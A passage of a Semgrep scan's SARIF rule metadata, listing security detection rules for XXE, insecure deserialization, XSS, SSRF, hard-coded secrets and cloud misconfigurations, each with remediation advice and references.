[https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","id":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","name":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","id":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","name":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Square OAuth Secret detected"},"help":{"markdown":"Square OAuth Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret)\n - [https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py](https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py)\n","text":"Square OAuth Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","id":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","name":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","id":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","name":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"help":{"markdown":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1)\n - [https://link.springer.com/chapter/10.1007/BFb0055716](https://link.springer.com/chapter/10.1007/BFb0055716)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://www.pycryptodome.org/src/cipher/pkcs1_v1_5](https://www.pycryptodome.org/src/cipher/pkcs1_v1_5)\n","text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","id":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","name":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","id":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","name":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","id":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","name":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"help":{"markdown":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication)\n - [https://cwe.mitre.org/data/definitions/287.html](https://cwe.mitre.org/data/definitions/287.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n","text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"helpUri":"https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","id":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","name":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A04:2021 Insecure Design","OWASP-A07:2021 Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","id":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","name":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep)\n - [https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html](https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"helpUri":"https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","id":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","name":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"helpUri":"https://semgrep.dev/r/go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","id":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","name":"go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.xss.gin-formatted-template-string-taint.formatted-template-string-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.puppeteer-express.puppeteer-express","id":"javascript.express.code.puppeteer-express.puppeteer-express","name":"javascript.express.code.puppeteer-express.puppeteer-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.puppeteer-express.puppeteer-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"help":{"markdown":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper)\n","text":"Found usage of 'importlib.abc.ResourceReader'. This module is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use another loader."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-textiowrapper","id":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","name":"python.lang.compatibility.python37.python37-compatibility-textiowrapper","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-textiowrapper"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users."},"help":{"markdown":"Detected 'io.WriteString()' writing directly to 'http.ResponseWriter'. This bypasses HTML escaping that prevents cross-site scripting vulnerabilities. Instead, use the 'html/template' package to render data to users.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.xss.no-io-writestring-to-responsewriter.no-io-writestring-to-responsewriter)\n - [https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/](https://blogtitle.github.io/robn-go-security-pearls-cross-site-scripting-xss/)\n - 